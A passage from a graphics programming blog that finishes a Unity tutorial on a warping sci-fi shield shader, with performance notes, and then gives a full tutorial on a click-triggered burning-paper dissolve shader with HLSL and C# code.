<p>And finally, you may notice that we’re not actually drawing anything to the screen anymore. We need to tell our shieldCam that it’s cool to render everything to the frame buffer when it’s done. I like to keep as much of the logic for an effect within the same script as I can, so I did this by adding a new function to our effect script, and putting a component on the shield camera to call this inside an OnPostRenderCall. You can find a scene with everything set up like this in the code dump at the end of the article.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">public</span> <span class="kt">void</span> <span class="nf">BlitToScreen</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">Graphics</span><span class="p">.</span><span class="n">Blit</span><span class="p">(</span><span class="n">finalRT</span><span class="p">,</span> <span class="p">(</span><span class="n">RenderTexture</span><span class="p">)</span><span class="n">null</span><span class="p">);</span>
<span class="n">screenRT</span><span class="p">.</span><span class="n">DiscardContents</span><span class="p">();</span>
<span class="n">finalRT</span><span class="p">.</span><span class="n">DiscardContents</span><span class="p">();</span>
<span class="n">shieldRT</span><span class="p">.</span><span class="n">DiscardContents</span><span class="p">();</span>
<span class="p">}</span></code></pre></figure>
<p>Notice that we also clear the contents of our render textures in this function.</p>
<h3>Warping Inside our Fragment Shaders</h3>
<p>There’s one last thing we need to do to finish this effect, and that’s to move the logic that used to live in our composite shader to the shader we use to draw our shields. There’s a completed shader at the end of this article but all we’re doing is adding uniforms to the shader so we can see the screenRT and shieldRT (the warp buffer), and then filling in areas of our object that would be transparent if we were alpha blending with a distorted lookup into screenRT. The addition to the fragment shader looks like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">v2f</span> <span class="n">i</span><span class="p">)</span> <span class="o">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="n">float3</span> <span class="n">viewdir</span> <span class="o">=</span> <span class="n">normalize</span><span class="p">(</span><span class="n">_WorldSpaceCameraPos</span> <span class="o">-</span> <span class="n">i</span><span class="p">.</span><span class="n">worldPos</span><span class="p">);</span>
<span class="kt">float</span> <span class="n">ang</span> <span class="o">=</span> <span class="mi">1</span> <span class="o">-</span> <span class="p">(</span><span class="n">abs</span><span class="p">(</span><span class="n">dot</span><span class="p">(</span><span class="n">viewdir</span><span class="p">,</span> <span class="n">normalize</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">normal</span><span class="p">))));</span>
<span class="n">half4</span> <span class="n">rimCol</span> <span class="o">=</span> <span class="n">_RimColor</span> <span class="o">*</span> <span class="n">pow</span><span class="p">(</span><span class="n">ang</span><span class="p">,</span> <span class="n">_RimPower</span><span class="p">)</span> <span class="o">*</span> <span class="n">_RimIntensity</span><span class="p">;</span>
<span class="n">half4</span> <span class="n">texColor</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">texcoord</span><span class="p">);</span>
<span class="n">fixed4</span> <span class="n">tex</span> <span class="o">=</span> <span class="n">rimCol</span> <span class="o">*</span> <span class="n">texColor</span><span class="p">;</span>
<span class="n">float4</span> <span class="n">screen</span> <span class="o">=</span> <span class="n">ComputeScreenPos</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">objectPos</span><span class="p">);</span>
<span class="n">fixed4</span> <span class="n">distortion</span> <span class="o">=</span> <span class="n">tex2Dproj</span><span class="p">(</span><span class="n">_DistortionBuffer</span><span class="p">,</span> <span class="n">UNITY_PROJ_COORD</span><span class="p">(</span><span class="n">screen</span><span class="p">));</span>
<span class="n">float4</span> <span class="n">screenPos</span> <span class="o">=</span> <span class="n">screen</span><span class="p">;</span>
<span class="n">screenPos</span><span class="p">.</span><span class="n">xy</span> <span class="o">=</span> <span class="n">screenPos</span><span class="p">.</span><span class="n">xy</span> <span class="o">-</span> <span class="p">(</span><span class="n">distortion</span><span class="p">.</span><span class="n">rb</span> <span class="o">-</span> <span class="mf">0.5</span><span class="p">)</span> <span class="o">*</span> <span class="mf">1.5</span><span class="p">;</span>
<span class="n">float4</span> <span class="n">d</span> <span class="o">=</span> <span class="n">tex2Dproj</span><span class="p">(</span><span class="n">_ScreenBuffer</span><span class="p">,</span> <span class="n">UNITY_PROJ_COORD</span><span class="p">(</span><span class="n">screenPos</span><span class="p">));</span>
<span class="k">return</span> <span class="n">tex</span> <span class="o">+</span> <span class="n">d</span> <span class="o">+</span> <span class="n">texColor</span> <span class="o">*</span> <span class="nf">CalcShieldIntensity16</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">oPos</span><span class="p">);</span>
<span class="err">}</span></code></pre></figure>
<p>The ComputeScreenPos and UNITY_PROJ_COORD macros do most of the hard work for us here, but you can see where we’ve basically lifted the logic completely from the composite shader and added it here. This is going to make our 100% opaque objects look like they’re alpha blending with a warp effect. It also lets our war effect be occluded by geometry, by other warp effects, and if you took my advice and wrote out a non warp version of shield to the main camera, you can see one shield through another. All of this put together might look something like this:</p>
<div align="center">
<img src="/images/post_images/2016-1-15/spaceshipfinal.gif" />
<br />
<br />
</div>
<p>When you look at the final shader I have posted in the google drive, you’ll also notice that I’ve added a second pass to it so that we can properly show the shield impacts on the side of the shield behind the ship we’re looking at. I skipped over the distortion effect in that pass to make it a bit more performant, but I wanted to keep the shield impacts so that the player could see all the direction that they were being shot at from. Again, this is open to interpretation, as it does make the shader much more expensive.</p>
<p>And At last, that’s everything!</p>
<h2>How Expensive Is This</h2>
<p>So the inevitable question that’s always (rightly) asked about cool graphics code is “how expensive is it?” So before we wrap up for today, let’s do a quick performance analysis of our new shield versus the original shield posted and figure out exactly what using either of them means for our performance. Since virutally all my Unity experience is on mobile, let’s look at this like our intended target is a mobile device.</p>
<p>On the draw call front, the original shader from Warfleet comes in the lowest, with a single draw call. This is followed by my optimized version of the shader, which I added a draw call to so that we could render the inside/back face of the sphere’s impacts as well. Our post effect version comes in last, with a draw call to render the shield to our buffer, and 1 draw call per side of the shield that we’re rendering.</p>
<p>It’s worth noting that if all you’re looking for is a more performant version of the original effect, you could remove the back face pass in the optimized version and be there.</p>
<p>Finally, I’ve set up a small test scene to see what the on device cost of the effect is. The scene is simple enough, whenever I tap the screen I spawn another instance of the shield and offset it a bit from the first one. I’ve turned on the on board profiler on an iPhone 6 to grab the performance data over time. It’s not a perfect test, but the test scene is consistent across every shader so at least the numbers will be useful. Here are the results:</p>
<div align="center">
<img src="/images/post_images/2016-1-15/performance.png" />
<br />
<br />
</div>
<p>Remember that these results are on a metal capable device (which means the cost of a draw call is lower than you’d see on OpenGL), these numbers are only useful relative to each other, and not as an absolute measure of the cost of these shaders on any device except the iPhone 6.</p>
<h2>Conclusion</h2>
<p>That should do it, as said above, the source for everything here can be found on google drive <a href="https://drive.google.com/folderview?id=0B85AH3b17yxpaHRrVVVVWmpnNVk&usp=sharing">here</a>. Hopefully this has been helpful enough that you don’t feel limited to just making sci fi shields, but feel like you can go forth and create refraction shaders, heat haze, whatever!</p>
<p>If you have any questions about anything, spot a mistake, or just want to say hi, send me a message <a href="http://twitter.com/khalladay">on twitter</a>.</p>
<p>Happy shading!</p>
A Burning Paper Shader2015-11-10T00:00:00+00:00http://kylehalladay.com/blog/tutorial/2015/11/10/Dissolve-Shader-Redux<p>After a long hiatus, I’ve decided to start posting again! And I can think of no better way to kick that off than with revisiting a <a href="http://kylehalladay.com/blog/tutorial/bestof/2013/09/28/How-to-dissolve-effect.html">cheesy old shader</a> that I posted 2 years ago.</p>
<p>So today we’re revisitng the “Dissolve” shader effect. I’ve seen this effect pop up more and more lately, mostly on 2D elements ( like in <a href="https://youtu.be/1a80WbuwGWw?t=6m19s">Hearthstone</a> and <a href="https://youtu.be/9DIV8Hwy4n0?t=46s">Armello</a> ), so today we’re going to see what we can get working on a plane, and then torch an unsuspecting 3D fence.</p>
<p>Ok, enough intro! Let’s take a look at what we’re building:</p>
<div align="center">
<img src="/images/post_images/2015-10-27/targetdissolve.gif" />
<br />
<br />
</div>
<h2>Breaking things down</h2>
<p>To start, let’s get the core part of the effect down: dissolving a mesh based on a texture. This is the easiest part to get right, since there really isn’t any need for artistic interpretation. You probably noticed that the above gif starts dissolving from one point and works it’s way across the quad.We’ll get to that, but lets dissolve the entire quad uniformly first. Like so:</p>
<div align="center">
<img src="/images/post_images/2015-10-27/simpledissolve.gif" />
<br />
<br />
</div>
<p>All we need to achieve this is a texture to use as our dissolve control texture. This can be anything (and in some cases using the diffuse texture of the object yields really cool results), but for the most general purpose control texture, use a smoothed noise texture. You can google around for these, or create your own. One thing you’re going to want to look for is one with a reasonably good contrast, which is going to give you a really nice range for your dissolve effect.</p>
<p>Before we write any code, let’s get our math sorted out first. We want to expose a constant value which controls the dissolve effect (0 for completely dissolved, 1 for totally not dissolved), which I’m going to refer to as _DissolveValue for the rest of the post. Then we need to look up the colour value in the control texture for the fragment we’re currently shading and add that value to _DissolveValue. This gets us the following:</p>
<ul>
<li>Before the effect starts (_DissolveValue == 1), at pure black in the noise texture, our sum will be 1</li>
<li>When the effect ends (_DissolveValue == 0), at pure white in our noise texture, our sum will be 1</li>
</ul>
<p>Since we want to make sure that at the end, every pixel is transparent, we need to clamp our noise value to a maximum of 0.99, which will allow us to make the blanket statement that we can set any pixel who’s sum is < 1 to transparent.</p>
<p>As a fragment function, the above logic might look like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">vOUT</span> <span class="n">i</span><span class="p">)</span> <span class="o">:</span> <span class="n">COLOR</span>
<span class="p">{</span>
<span class="n">fixed4</span> <span class="n">mainTex</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">);</span>
<span class="n">fixed</span> <span class="n">noiseVal</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_NoiseTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">).</span><span class="n">r</span><span class="p">;</span>
<span class="n">mainTex</span><span class="p">.</span><span class="n">a</span> <span class="o">*=</span> <span class="n">floor</span><span class="p">(</span><span class="n">_DissolveVal</span> <span class="o">+</span> <span class="n">min</span><span class="p">(</span><span class="mf">0.99</span><span class="p">,</span><span class="n">noiseVal</span><span class="p">.</span><span class="n">r</span><span class="p">));</span>
<span class="k">return</span> <span class="n">mainTex</span><span class="p">;</span>
<span class="err">}</span></code></pre></figure>
<p>For brevity’s sake I’m going to omit posting the whole shader source as we work through it, but the full source is at the bottom of this article so if you’re stuck just jump down there and fill in any blanks.</p>
<h2>The Edge Details</h2>
<p>Ok, so we have our basic effect now, but it doesn’t really look like anything other than a janky shader effect, and I’ve found that in general “janky shader” isn’t high up on the things commonly asked for by artists. Let’s add some colour to the edges of the dissolve effect.</p>
<p>To do this, we’re going to use a gradient to control the colours of the edge, and we’ll use the alpha channel of that gradient to control our fragment’s alpha as the effect progresses. The leftmost pixel in the gradient will be our fully dissolved value, with an alpha of 0, while the rightmost pixel will be a completely untouched pixel with alpha of 1 and a colour value of white. What you put in between these two values is up to you, but for the effect I’m building, my gradient looks like this:</p>
<div align="left">
<img src="/images/post_images/2015-10-27/burngradient.png" />
<br />
</div>
<p>Instead of multiplying our alpha as we did before, this time we’re going to multiply the entire colour value of our pixel by a point in our gradient. As before, we want to make sure that a _DissolveValue of 1 is a fully untouched mesh, and when it’s 0, we have a fully transparent mesh. This changes our requirements for our math a little bit since we can’t just floor the sum and get a hard line between 1 and <1. We need to make sure that when _DissolveValue is 1, we are at an X value of 1, regardless of our noise texture, but we still want to make sure that at a _DissolveValue of 0 that we’re at an X value of 0 regardless of the value in our noise texture.</p>
<p>This might sound tricky, but it isn’t as long as you set the wrap mode of your gradient to “clamp,” so that we can get values outside the range of 0 and 1.Provided that’s set up correctly, the following will work just fine:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">vOUT</span> <span class="n">i</span><span class="p">)</span> <span class="o">:</span> <span class="n">COLOR</span>
<span class="p">{</span>
<span class="n">fixed4</span> <span class="n">mainTex</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">);</span>
<span class="n">fixed</span> <span class="n">noiseVal</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_NoiseTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">).</span><span class="n">r</span><span class="p">;</span>
<span class="n">fixed</span> <span class="n">d</span> <span class="o">=</span> <span class="p">(</span><span class="mf">2.0</span> <span class="o">*</span> <span class="n">_DissolveValue</span> <span class="o">+</span> <span class="n">noiseVal</span><span class="p">)</span> <span class="o">-</span> <span class="mf">1.0</span><span class="p">;</span>
<span class="n">fixed</span> <span class="n">overOne</span> <span class="o">=</span> <span class="n">saturate</span><span class="p">(</span><span class="n">d</span> <span class="o">*</span> <span class="n">_GradientAdjust</span><span class="p">);</span>
<span class="n">fixed4</span> <span class="n">burn</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_BurnGradient</span><span class="p">,</span> <span class="n">float2</span><span class="p">(</span> <span class="n">overOne</span><span class="p">,</span> <span class="mf">0.5</span><span class="p">));</span>
<span class="k">return</span> <span class="n">mainTex</span> <span class="o">*</span> <span class="n">burn</span><span class="p">;</span>
<span class="err">}</span></code></pre></figure>
<p>The _GradientAdjust parameter isn’t necessary to make the effect work, but it provides a great deal of control over how tight you want the edges of your effect to be (just make sure that its value is greater than 1). I found that with the gradient I was using, setting that parameter to 2 produced reasonably good results, which looked like this:</p>
<div align="right">
<img src="/images/post_images/2015-10-27/gradientdissolve.gif" />
<br />
</div>
<p>Notice that in the gif above, nothing really happens until we hit about _DissolveValue 0.5. This is dependent on the range of your noise texture, a higher contrast texture will show dissolve effects starting earlier and ending later.</p>
<h2>Making This Useful</h2>
<p>What we have right now looks pretty good, but it isn’t very useful. I think it’s safe to say that in almost every situation where this effect would look good, it would look way better if the effect came from one direction, or for our purposes today, started at a specific point.</p>
<p>Since we want the dissolve effect to radiate out from a point, what we need to do is define a function which will:</p>
<ul>
<li>Return 1 when _DissolveValue is 1</li>
<li>Return 0 when dissolveValue is 0</li>
<li>Returns a value between 0 and 1 which approaches 0 and the distance to our origin point decreases</li>
</ul>
<p>Let’s start from the obvious place and just add the distance to our previous calculation:</p>
<p>GradientXCoord = ((2.0 * _DissolveValue + NoiseTextureValue) * DistanceToPoint) - 1.0</p>
<p>This is as good a place to start as any, but we’re no longer guaranteed to return 1 when _DissolveVal is 1, and if the distance is > 1, the effect gets way less predictable.</p>
<p>The distance problem is probably what you’ll care about more at first, since it makes the _DissolveValue almost useless unless either your distance to the hit point is exceedingly small, or your _DissolveValue is exceedingly small. What we really want is for our distance value to have a range of 0 to 1 as well, which means we need a value to scale our distance by.</p>
<p>Through experimenting a bit, I’ve found that I get pretty good results with the largest distance between any 2 point on the mesh (in object space) divided by 2. As long as your origin point is on your mesh, just divide the distance from each fragment to the origin point by the max distance we’ve calculated to get a much nicer (although not stringly 0.0 - 1.0 in all cases) value.</p>
<p>You can calulate this scaling value with something like this attached to the object you want to use this shader with:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="nf">Start</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">float</span> <span class="n">maxVal</span> <span class="o">=</span> <span class="mf">0.0</span><span class="n">f</span><span class="p">;</span>
<span class="n">Material</span> <span class="n">dissolveMaterial</span> <span class="o">=</span> <span class="n">GetComponent</span><span class="o"><</span><span class="n">Renderer</span><span class="o">></span><span class="p">().</span><span class="n">material</span><span class="p">;</span>
<span class="n">var</span> <span class="n">verts</span> <span class="o">=</span> <span class="n">GetComponent</span><span class="o"><</span><span class="n">MeshFilter</span><span class="o">></span><span class="p">().</span><span class="n">mesh</span><span class="p">.</span><span class="n">vertices</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">verts</span><span class="p">.</span><span class="n">Length</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">var</span> <span class="n">v1</span> <span class="o">=</span> <span class="n">verts</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">j</span> <span class="o"><</span> <span class="n">verts</span><span class="p">.</span><span class="n">Length</span><span class="p">;</span> <span class="n">j</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">j</span> <span class="o">==</span> <span class="n">i</span><span class="p">)</span> <span class="k">continue</span><span class="p">;</span>
<span class="n">var</span> <span class="n">v2</span> <span class="o">=</span> <span class="n">verts</span><span class="p">[</span><span class="n">j</span><span class="p">];</span>
<span class="kt">float</span> <span class="n">mag</span> <span class="o">=</span> <span class="p">(</span><span class="n">v1</span><span class="o">-</span><span class="n">v2</span><span class="p">).</span><span class="n">magnitude</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">mag</span> <span class="o">></span> <span class="n">maxVal</span> <span class="p">)</span> <span class="n">maxVal</span> <span class="o">=</span> <span class="n">mag</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">dissolveMaterial</span><span class="p">.</span><span class="n">SetFloat</span><span class="p">(</span><span class="s">"_LargestVal"</span><span class="p">,</span> <span class="n">maxVal</span> <span class="o">*</span> <span class="mf">0.5</span><span class="n">f</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>Using this value, we can modify our fragment function to look like so:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">vOUT</span> <span class="n">i</span><span class="p">)</span> <span class="o">:</span> <span class="n">COLOR</span>
<span class="p">{</span>
<span class="n">fixed4</span> <span class="n">mainTex</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">);</span>
<span class="n">fixed</span> <span class="n">noiseVal</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_NoiseTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">).</span><span class="n">r</span><span class="p">;</span>
<span class="n">fixed</span> <span class="n">toPoint</span> <span class="o">=</span> <span class="p">(</span><span class="n">length</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">oPos</span><span class="p">.</span><span class="n">xyz</span> <span class="o">-</span> <span class="n">i</span><span class="p">.</span><span class="n">hitPos</span><span class="p">.</span><span class="n">xyz</span><span class="p">)</span> <span class="o">/</span> <span class="n">_LargestVal</span><span class="p">);</span>
<span class="n">fixed</span> <span class="n">d</span> <span class="o">=</span> <span class="p">(</span> <span class="p">(</span><span class="mf">2.0</span> <span class="o">*</span> <span class="n">_DissolveValue</span> <span class="o">+</span> <span class="n">noiseVal</span><span class="p">)</span> <span class="o">*</span> <span class="n">toPoint</span> <span class="p">)</span> <span class="o">-</span> <span class="mf">1.0</span><span class="p">;</span>
<span class="n">fixed</span> <span class="n">overOne</span> <span class="o">=</span> <span class="n">saturate</span><span class="p">(</span><span class="n">d</span> <span class="o">*</span> <span class="n">_GradientAdjust</span><span class="p">);</span>
<span class="n">fixed4</span> <span class="n">burn</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_BurnGradient</span><span class="p">,</span> <span class="n">float2</span><span class="p">(</span><span class="n">overOne</span><span class="p">,</span> <span class="mf">0.5</span><span class="p">));</span>
<span class="k">return</span> <span class="n">mainTex</span> <span class="o">*</span> <span class="n">burn</span><span class="p">;</span>
<span class="err">}</span></code></pre></figure>
<p>This actually is pretty close to our end product, but now we have a new problem: by scaling our distance like this, we no longer can guarantee that we have a fully opaque mesh at _DissolveValue 1. What we need to do is make our divisor smaller for higher values of _DissolveValue, which can be done like so:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">vOUT</span> <span class="n">i</span><span class="p">)</span> <span class="o">:</span> <span class="n">COLOR</span>
<span class="p">{</span>
<span class="n">fixed4</span> <span class="n">mainTex</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">);</span>
<span class="n">fixed</span> <span class="n">noiseVal</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_NoiseTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">).</span><span class="n">r</span><span class="p">;</span>
<span class="n">fixed</span> <span class="n">toPoint</span> <span class="o">=</span> <span class="p">(</span><span class="n">length</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">oPos</span><span class="p">.</span><span class="n">xyz</span> <span class="o">-</span> <span class="n">i</span><span class="p">.</span><span class="n">hitPos</span><span class="p">.</span><span class="n">xyz</span><span class="p">)</span> <span class="o">/</span> <span class="p">((</span><span class="mf">1.0001</span> <span class="o">-</span> <span class="n">_DissolveValue</span><span class="p">)</span> <span class="o">*</span> <span class="n">_LargestVal</span><span class="p">));</span>
<span class="n">fixed</span> <span class="n">d</span> <span class="o">=</span> <span class="p">(</span> <span class="p">(</span><span class="n">_DissolveValue</span> <span class="o">+</span> <span class="n">noiseVal</span><span class="p">)</span> <span class="o">*</span> <span class="n">toPoint</span> <span class="p">)</span> <span class="o">-</span> <span class="mf">1.0</span><span class="p">;</span>
<span class="n">fixed</span> <span class="n">overOne</span> <span class="o">=</span> <span class="n">saturate</span><span class="p">(</span><span class="n">d</span> <span class="o">*</span> <span class="n">_GradientAdjust</span><span class="p">);</span>
<span class="n">fixed4</span> <span class="n">burn</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_BurnGradient</span><span class="p">,</span> <span class="n">float2</span><span class="p">(</span> <span class="n">overOne</span><span class="p">,</span> <span class="mf">0.5</span><span class="p">));</span>
<span class="k">return</span> <span class="n">mainTex</span> <span class="o">*</span> <span class="n">burn</span><span class="p">;</span>
<span class="err">}</span></code></pre></figure>
<p>Make sure that whatever number you subtract _DissolveValue from when you do this is greater than the max value that you can set _DissolveValue to, otherwise you risk dividing by 0 at some point in your effect, which can cause all kinds of problems.</p>
<p>With the above fragment function, you now have a perfectly good shader, but I made one additional artistic modification: I multiplied my final toPoint variable by the noise value before calculating d. This helped me avoid having a perfectly circular hole at high values of the _DissolveValue. It’s not necessary, but I think it looks a lot better.</p>
<p>Using the above script / shader, when I applied this shader to an object, the effect I got looked like this:</p>
<div align="right">
<img src="/images/post_images/2015-10-27/fencedissolve.gif" />
<br />
</div>
<h2>Practical Implementation Details</h2>
<p>Although we have our shader now, we aren’t done. As with a lot of effects, this one is best when it’s driven by some addition cpu side logic. For one, where are we getting our hit point from? Wouldn’t it be awesome if we could drive that by a mouse click and start burning our paper / fence / whatever at whatever point we wanted?</p>
<p>To do that, let’s expand the script we used to set the max value and give it some additional logic. We also will need to modify our above start function to use the variable _dissolveMaterial instead of the one we used before, which was scoped locally to our start function. I’m going to leave that out here, but the full source is available at the end.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">private</span> <span class="kt">float</span> <span class="n">_value</span> <span class="o">=</span> <span class="mf">1.0</span><span class="n">f</span><span class="p">;</span>
<span class="k">private</span> <span class="kt">bool</span> <span class="n">_isRunning</span> <span class="o">=</span> <span class="nb">false</span><span class="p">;</span>
<span class="k">private</span> <span class="n">Material</span> <span class="n">_dissolveMaterial</span> <span class="o">=</span> <span class="n">null</span><span class="p">;</span>
<span class="k">public</span> <span class="kt">float</span> <span class="n">timeScale</span> <span class="o">=</span> <span class="mf">1.0</span><span class="n">f</span><span class="p">;</span>
<span class="k">public</span> <span class="kt">void</span> <span class="nf">Reset</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">_value</span> <span class="o">=</span> <span class="mf">1.0</span><span class="n">f</span><span class="p">;</span>
<span class="n">_dissolveMaterial</span><span class="p">.</span><span class="n">SetFloat</span><span class="p">(</span><span class="s">"_DissolveValue"</span><span class="p">,</span> <span class="n">_value</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">public</span> <span class="kt">void</span> <span class="nf">TriggerDissolve</span><span class="p">(</span><span class="n">Vector3</span> <span class="n">hitPoint</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">_value</span> <span class="o">=</span> <span class="mf">1.0</span><span class="n">f</span><span class="p">;</span>
<span class="n">_dissolveMaterial</span><span class="p">.</span><span class="n">SetVector</span><span class="p">(</span><span class="s">"_HitPos"</span><span class="p">,</span> <span class="p">(</span><span class="k">new</span> <span class="n">Vector4</span><span class="p">(</span><span class="n">hitPoint</span><span class="p">.</span><span class="n">x</span><span class="p">,</span> <span class="n">hitPoint</span><span class="p">.</span><span class="n">y</span><span class="p">,</span> <span class="n">hitPoint</span><span class="p">.</span><span class="n">z</span><span class="p">,</span> <span class="mf">1.0</span><span class="n">f</span><span class="p">)));</span>
<span class="n">_isRunning</span> <span class="o">=</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">Update</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">_isRunning</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">_value</span> <span class="o">=</span> <span class="n">Mathf</span><span class="p">.</span><span class="n">Max</span><span class="p">(</span><span class="mf">0.0</span><span class="n">f</span><span class="p">,</span> <span class="n">_value</span> <span class="o">-</span> <span class="n">Time</span><span class="p">.</span><span class="n">deltaTime</span><span class="o">*</span><span class="n">timeScale</span><span class="p">);</span>
<span class="n">_dissolveMaterial</span><span class="p">.</span><span class="n">SetFloat</span><span class="p">(</span><span class="s">"_DissolveValue"</span><span class="p">,</span> <span class="n">_value</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>With this, assuming that our shader is going to handle transforming the hit point into object space, all we need now is to cast a ray from the point on the screen where our mouse clicks and pass the hitpoint on our object’s collider to this script.</p>
<p>I’m going to handle this in a different script, so that we can put our dissolve script on multiple objects, but only cast 1 ray for all of them:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">public</span> <span class="k">class</span> <span class="nc">TriggerDissolveOnClick</span> <span class="o">:</span> <span class="n">MonoBehaviour</span>
<span class="p">{</span>
<span class="n">Vector3</span> <span class="n">point</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">didHit</span> <span class="o">=</span> <span class="nb">false</span><span class="p">;</span>
<span class="n">DissolveEffect</span> <span class="n">targetEffect</span><span class="p">;</span>
<span class="kt">void</span> <span class="n">Update</span> <span class="p">()</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">Input</span><span class="p">.</span><span class="n">GetMouseButton</span><span class="p">(</span><span class="mi">0</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">RaycastHit</span> <span class="n">hitInfo</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">Physics</span><span class="p">.</span><span class="n">Raycast</span><span class="p">(</span><span class="n">Camera</span><span class="p">.</span><span class="n">main</span><span class="p">.</span><span class="n">ScreenPointToRay</span><span class="p">(</span><span class="n">Input</span><span class="p">.</span><span class="n">mousePosition</span><span class="p">),</span><span class="n">out</span> <span class="n">hitInfo</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">targetEffect</span> <span class="o">=</span> <span class="n">hitInfo</span><span class="p">.</span><span class="n">collider</span><span class="p">.</span><span class="n">gameObject</span><span class="p">.</span><span class="n">GetComponent</span><span class="o"><</span><span class="n">DissolveEffect</span><span class="o">></span><span class="p">();</span>
<span class="k">if</span> <span class="p">(</span><span class="n">targetEffect</span> <span class="o">!=</span> <span class="n">null</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">didHit</span> <span class="o">=</span> <span class="nb">true</span><span class="p">;</span>
<span class="n">point</span> <span class="o">=</span> <span class="n">hitInfo</span><span class="p">.</span><span class="n">point</span><span class="p">;</span>
<span class="n">targetEffect</span><span class="p">.</span><span class="n">Reset</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">didHit</span> <span class="o">&&</span> <span class="n">Input</span><span class="p">.</span><span class="n">GetMouseButtonUp</span><span class="p">(</span><span class="mi">0</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">targetEffect</span><span class="p">.</span><span class="n">TriggerDissolve</span><span class="p">(</span><span class="n">point</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>I attached the above script to my main camera (although it isn’t required as long as it’s somewhere in your scene). Once that’s all set up, you can put the DissolveEffect script on any object which uses our dissolve shader, and 1 click will give the the Marvin the Martian treatment:</p>
<div align="right">
<img src="/images/post_images/2015-10-27/multidissolve.gif" />
<br />
</div>
